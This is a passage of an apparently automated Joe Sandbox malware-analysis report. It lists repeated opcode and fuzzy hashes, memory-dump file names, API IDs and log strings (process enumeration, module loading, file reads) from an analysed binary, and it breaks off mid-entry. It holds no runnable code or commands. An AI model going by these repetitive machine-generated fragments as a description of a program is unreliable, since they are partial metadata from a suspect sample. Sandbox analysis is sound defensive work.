                                                      • Opcode ID: f7968e485989eb5247307d17b61265f3b96f0deac1df6c17409495cdd1f28a9b
                                                      • Instruction ID: 579bbe12ae004132ccc705466e1160485dc9dbd42bfd6b1c819120a5353604f6
                                                      • Opcode Fuzzy Hash: f7968e485989eb5247307d17b61265f3b96f0deac1df6c17409495cdd1f28a9b
                                                      • Instruction Fuzzy Hash: 39F03751E48A43D6FE25675CEAD817812B5EF6F744F808032E40ECF6A5EE6CE944830D
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: CloseErrorHandleLastNextProcess32
                                                      • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                                                      • API String ID: 1692733154-1215713629
                                                      • Opcode ID: d603581fc06708a95ad35b39a4fddb14ab4b4737cd2f820cbdeb3fc7c7cf88f9
                                                      • Instruction ID: e46402650d8e36315a7b2cff964b9275737b2daf7f7c3b530a35de623fc0f5e4
                                                      • Opcode Fuzzy Hash: d603581fc06708a95ad35b39a4fddb14ab4b4737cd2f820cbdeb3fc7c7cf88f9
                                                      • Instruction Fuzzy Hash: FAF03751E48A43D6FE24675CEAC817812B1EF6F744F808032E40ECF6A5EE6CE944830D
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: CloseErrorHandleLastNextProcess32
                                                      • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                                                      • API String ID: 1692733154-1215713629
                                                      • Opcode ID: 41b1c1eafcc7ebc97e913e8cca0af6e3351bd43c4327a88d1a55e02c619556bc
                                                      • Instruction ID: 6ce400fdeca3a42da25d4c0e83c9500f7a15bfe6ae7282a9d627082f1397bf22
                                                      • Opcode Fuzzy Hash: 41b1c1eafcc7ebc97e913e8cca0af6e3351bd43c4327a88d1a55e02c619556bc
                                                      • Instruction Fuzzy Hash: 69F03751E48A43D6FE646B5CEAC817812B1EF6F744F808032E40ECE6A5EE2CE944830D
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastLibraryLoadfflushfwrite
                                                      • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                      • API String ID: 4085810780-3386190286
                                                      • Opcode ID: dffd9c4dfdfa348c0933c47837ca62ed3df51fd0b9f0c726f591125bfae7f7ef
                                                      • Instruction ID: 6a9aa77058fc1fae6f1b8db6fe339dc0d5263e561f0859aebbc046ad9fd9e530
                                                      • Opcode Fuzzy Hash: dffd9c4dfdfa348c0933c47837ca62ed3df51fd0b9f0c726f591125bfae7f7ef
                                                      • Instruction Fuzzy Hash: 8EF09060E49607D1FD90975EAAC04F012309F3F784F080031E94DAF760ED1CA549C304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: 45454886e19af0f3a1d46188feaae8401dd09c0e9c6c59378aac8472f3ab07f3
                                                      • Instruction ID: 124597de748472ad24060ff1b70a01ad1025f7f407483bf1de18b61c2d7c7367
                                                      • Opcode Fuzzy Hash: 45454886e19af0f3a1d46188feaae8401dd09c0e9c6c59378aac8472f3ab07f3
                                                      • Instruction Fuzzy Hash: 7FF05E13B48203C3FD529A09B6817B96261AFAA765E890535ED5C8F6D1EE3DA8878304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: e33692760d6982d61dafc9675408eb25253a5ea45f82db5d17f1cf7bcd550c10
                                                      • Instruction ID: 1f846159e828160cd3cdc8d0a8ca913923ba2e82c14d2e6748f813c85ec08460
                                                      • Opcode Fuzzy Hash: e33692760d6982d61dafc9675408eb25253a5ea45f82db5d17f1cf7bcd550c10
                                                      • Instruction Fuzzy Hash: F4F05413B48203C3FD529A0976807B961615FAA765E890535ED5CCE6D1EE3D68878304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: fc9ac18d2d3b85d97e220ba5648c8f5163264cc353de88d57e199d5ec4a0326b
                                                      • Instruction ID: e7610c4f53ef4b956401f3525b0aa808724e35ad2750b4b5f3ad730550baf1fd
                                                      • Opcode Fuzzy Hash: fc9ac18d2d3b85d97e220ba5648c8f5163264cc353de88d57e199d5ec4a0326b
                                                      • Instruction Fuzzy Hash: 02F05E13F48203C3FD529A09B6807B96261AFAA765E890535ED5C8E6D1EE3DA8878304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: e33692760d6982d61dafc9675408eb25253a5ea45f82db5d17f1cf7bcd550c10
                                                      • Instruction ID: 1f846159e828160cd3cdc8d0a8ca913923ba2e82c14d2e6748f813c85ec08460
                                                      • Opcode Fuzzy Hash: e33692760d6982d61dafc9675408eb25253a5ea45f82db5d17f1cf7bcd550c10
                                                      • Instruction Fuzzy Hash: F4F05413B48203C3FD529A0976807B961615FAA765E890535ED5CCE6D1EE3D68878304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: fc9ac18d2d3b85d97e220ba5648c8f5163264cc353de88d57e199d5ec4a0326b
                                                      • Instruction ID: e7610c4f53ef4b956401f3525b0aa808724e35ad2750b4b5f3ad730550baf1fd
                                                      • Opcode Fuzzy Hash: fc9ac18d2d3b85d97e220ba5648c8f5163264cc353de88d57e199d5ec4a0326b
                                                      • Instruction Fuzzy Hash: 02F05E13F48203C3FD529A09B6807B96261AFAA765E890535ED5C8E6D1EE3DA8878304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: 3578e000deca6bf0f55c4be3ab5e47372c0efc907d12420e65de4e4252440305
                                                      • Instruction ID: f86cd0f2d8c127f5c3dafb354d7f64b48461c37dfe2fa055fa25b3342361b0db
                                                      • Opcode Fuzzy Hash: 3578e000deca6bf0f55c4be3ab5e47372c0efc907d12420e65de4e4252440305
                                                      • Instruction Fuzzy Hash: C4F05413B48103C3FD529A0976807B961619FAA765E8D0535ED5C8F7D1EE3D69878304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: e599e79aec15f9801f37150ba1dbf11dbf751d0666428e49097c96ca17fbfad9
                                                      • Instruction ID: b3bdd22cde69bf3090957c40fe9e36941defbb761cdd6d8862c20391795350a2
                                                      • Opcode Fuzzy Hash: e599e79aec15f9801f37150ba1dbf11dbf751d0666428e49097c96ca17fbfad9
                                                      • Instruction Fuzzy Hash: C2F0B413B48203C3FD529A0876807B921215FAA761E890535ED0C8E6D1EE3C68878304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: 05b559bd4724005287958f140b8183a08227340bf4a559bd9d3731c32517380e
                                                      • Instruction ID: 327dcdab640119780b6a5418200b56028045533e93150860ad6b174d729a2151
                                                      • Opcode Fuzzy Hash: 05b559bd4724005287958f140b8183a08227340bf4a559bd9d3731c32517380e
                                                      • Instruction Fuzzy Hash: A8F05E13F48203C3FD529A09B6807B96261AFAA761E890535ED5C8E6D1EE3DA8878304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: 05b559bd4724005287958f140b8183a08227340bf4a559bd9d3731c32517380e
                                                      • Instruction ID: 327dcdab640119780b6a5418200b56028045533e93150860ad6b174d729a2151
                                                      • Opcode Fuzzy Hash: 05b559bd4724005287958f140b8183a08227340bf4a559bd9d3731c32517380e
                                                      • Instruction Fuzzy Hash: A8F05E13F48203C3FD529A09B6807B96261AFAA761E890535ED5C8E6D1EE3DA8878304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: 45454886e19af0f3a1d46188feaae8401dd09c0e9c6c59378aac8472f3ab07f3
                                                      • Instruction ID: 124597de748472ad24060ff1b70a01ad1025f7f407483bf1de18b61c2d7c7367
                                                      • Opcode Fuzzy Hash: 45454886e19af0f3a1d46188feaae8401dd09c0e9c6c59378aac8472f3ab07f3
                                                      • Instruction Fuzzy Hash: 7FF05E13B48203C3FD529A09B6817B96261AFAA765E890535ED5C8F6D1EE3DA8878304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: e599e79aec15f9801f37150ba1dbf11dbf751d0666428e49097c96ca17fbfad9
                                                      • Instruction ID: b3bdd22cde69bf3090957c40fe9e36941defbb761cdd6d8862c20391795350a2
                                                      • Opcode Fuzzy Hash: e599e79aec15f9801f37150ba1dbf11dbf751d0666428e49097c96ca17fbfad9
                                                      • Instruction Fuzzy Hash: C2F0B413B48203C3FD529A0876807B921215FAA761E890535ED0C8E6D1EE3C68878304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: 45454886e19af0f3a1d46188feaae8401dd09c0e9c6c59378aac8472f3ab07f3
                                                      • Instruction ID: 124597de748472ad24060ff1b70a01ad1025f7f407483bf1de18b61c2d7c7367
                                                      • Opcode Fuzzy Hash: 45454886e19af0f3a1d46188feaae8401dd09c0e9c6c59378aac8472f3ab07f3
                                                      • Instruction Fuzzy Hash: 7FF05E13B48203C3FD529A09B6817B96261AFAA765E890535ED5C8F6D1EE3DA8878304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: e33692760d6982d61dafc9675408eb25253a5ea45f82db5d17f1cf7bcd550c10
                                                      • Instruction ID: 1f846159e828160cd3cdc8d0a8ca913923ba2e82c14d2e6748f813c85ec08460
                                                      • Opcode Fuzzy Hash: e33692760d6982d61dafc9675408eb25253a5ea45f82db5d17f1cf7bcd550c10
                                                      • Instruction Fuzzy Hash: F4F05413B48203C3FD529A0976807B961615FAA765E890535ED5CCE6D1EE3D68878304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: fc9ac18d2d3b85d97e220ba5648c8f5163264cc353de88d57e199d5ec4a0326b
                                                      • Instruction ID: e7610c4f53ef4b956401f3525b0aa808724e35ad2750b4b5f3ad730550baf1fd
                                                      • Opcode Fuzzy Hash: fc9ac18d2d3b85d97e220ba5648c8f5163264cc353de88d57e199d5ec4a0326b
                                                      • Instruction Fuzzy Hash: 02F05E13F48203C3FD529A09B6807B96261AFAA765E890535ED5C8E6D1EE3DA8878304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
